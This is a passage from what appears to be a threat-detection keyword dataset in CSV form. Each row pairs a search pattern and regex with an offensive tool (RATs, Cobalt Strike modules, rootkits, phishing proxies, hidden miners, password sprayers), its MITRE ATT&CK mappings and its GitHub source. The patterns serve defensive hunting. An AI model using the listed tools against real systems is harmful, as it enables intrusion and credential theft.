T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*www.revshells.com*",".{0,1000}www\.revshells\.com.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*www.securityfocus.com/archive/1/514379*",".{0,1000}www\.securityfocus\.com\/archive\/1\/514379.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*www.tor2web.org*",".{0,1000}www\.tor2web\.org.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*www.vsecurity.com/download/tools/*",".{0,1000}www\.vsecurity\.com\/download\/tools\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*www.wfuzz.org*",".{0,1000}www\.wfuzz\.org.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wxfuzz.bat*",".{0,1000}wxfuzz\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wxfuzz.py*",".{0,1000}wxfuzz\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*WypdIENhbid0IENvbm5lY3QgQWxpeXVuIEJ1Y2tldC4=*",".{0,1000}WypdIENhbid0IENvbm5lY3QgQWxpeXVuIEJ1Y2tldC4\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*WypdIFRoZSBCdWNrZXQgb3IgUmVmbGVjdGl2ZSBETEwgVVJJIGlzIEVtcHR5Lg==*",".{0,1000}WypdIFRoZSBCdWNrZXQgb3IgUmVmbGVjdGl2ZSBETEwgVVJJIGlzIEVtcHR5Lg\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*WytdIEluamVjdGVkIHRoZSA=*",".{0,1000}WytdIEluamVjdGVkIHRoZSA\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*-x *net group *Domain Admins* /domain*",".{0,1000}\-x\s.{0,1000}net\sgroup\s.{0,1000}Domain\sAdmins.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*X32_ClSp_Tcp_Exe.exe*",".{0,1000}X32_ClSp_Tcp_Exe\.exe.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*x64/CelestialSpark.asm*",".{0,1000}x64\/CelestialSpark\.asm.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","1","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*X64_ClSp_Tcp_Exe.exe*",".{0,1000}X64_ClSp_Tcp_Exe\.exe.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*x64PELoader/*.exe*",".{0,1000}x64PELoader\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*x64win-DynamicNoNull-WinExec-PopCalc-Shellcode*",".{0,1000}x64win\-DynamicNoNull\-WinExec\-PopCalc\-Shellcode.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*x86_64-unknown-uefi*",".{0,1000}x86_64\-unknown\-uefi.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","487","58","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*x86PELoader/*.exe*",".{0,1000}x86PELoader\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*x86PELoader/test_agent_dll*",".{0,1000}x86PELoader\/test_agent_dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*x86PELoader/test_agent_exe*",".{0,1000}x86PELoader\/test_agent_exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*x86PELoader/test_proxy_dll*",".{0,1000}x86PELoader\/test_proxy_dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*x86PELoader/test_proxy_exe*",".{0,1000}x86PELoader\/test_proxy_exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*x90skysn3k*",".{0,1000}x90skysn3k.{0,1000}","offensive_tool_keyword","Github Username","Github username known for password exploitation and offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/x90skysn3k","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*x90skysn3k/brutespray*",".{0,1000}x90skysn3k\/brutespray.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*xato-net-10-million-usernames.txt*",".{0,1000}xato\-net\-10\-million\-usernames\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*X-C2-Beacon*",".{0,1000}X\-C2\-Beacon.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*xcopy /y /d *\msquic_schannel\msquic.dll*",".{0,1000}xcopy\s\/y\s\/d\s\s.{0,1000}\\msquic_schannel\\msquic\.dll.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","0","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*xdp/backdoor.h*",".{0,1000}xdp\/backdoor\.h.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*xeno rat client.exe*",".{0,1000}xeno\srat\sclient\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*xeno rat server.exe*",".{0,1000}xeno\srat\sserver\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*xeno%20rat%20client.exe*",".{0,1000}xeno\%20rat\%20client\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*xeno%20rat%20server.exe*",".{0,1000}xeno\%20rat\%20server\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*Xeno_manager.exe*",".{0,1000}Xeno_manager\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*XenoUpdateManager.lnk*",".{0,1000}XenoUpdateManager\.lnk.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*X-Evilginx*",".{0,1000}X\-Evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*xforcered/CredBandit*",".{0,1000}xforcered\/CredBandit.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","228","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*xforcered/Detect-Hooks*",".{0,1000}xforcered\/Detect\-Hooks.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/Detect-Hooks","1","1","N/A","10","10","91","6","2021-07-22T20:13:16Z","2021-07-23T16:10:37Z" "*xforwardedfor.py*",".{0,1000}xforwardedfor\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*xFreed0m/RDPassSpray*",".{0,1000}xFreed0m\/RDPassSpray.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*xfreerdp /v*SOCtest*AllLegitHere*",".{0,1000}xfreerdp\s\/v.{0,1000}SOCtest.{0,1000}AllLegitHere.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*xfrm_poc*lucky0*",".{0,1000}xfrm_poc.{0,1000}lucky0.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*X-Gophish-Contact*",".{0,1000}X\-Gophish\-Contact.{0,1000}","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","0","N/A","N/A","10","10656","1973","2024-04-15T08:29:57Z","2013-11-18T23:26:43Z" "*XiaoliChan/wmiexec-Pro*",".{0,1000}XiaoliChan\/wmiexec\-Pro.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*xillwillx*",".{0,1000}xillwillx.{0,1000}","offensive_tool_keyword","Github Username","github repo username hosting red team tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/xillwillx","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*xillwillx/tricky.lnk*",".{0,1000}xillwillx\/tricky\.lnk.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*XiphosResearch*",".{0,1000}XiphosResearch.{0,1000}","offensive_tool_keyword","exploits","Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.","T1203 - T1068 - T1062 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/XiphosResearch/exploits","1","0","N/A","N/A","10","1484","583","2023-10-06T19:57:20Z","2015-03-05T11:15:07Z" "*x-ishavocframework*",".{0,1000}x\-ishavocframework.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*xmendez/wfuzz*",".{0,1000}xmendez\/wfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*XML-External-Entity-(XXE)-Payloads*",".{0,1000}XML\-External\-Entity\-\(XXE\)\-Payloads.{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*xmr.2miners.com*",".{0,1000}xmr\.2miners\.com.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*XOR Shellcode Encoder.csproj*",".{0,1000}XOR\sShellcode\sEncoder\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*xor.exe *.txt*",".{0,1000}xor\.exe\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 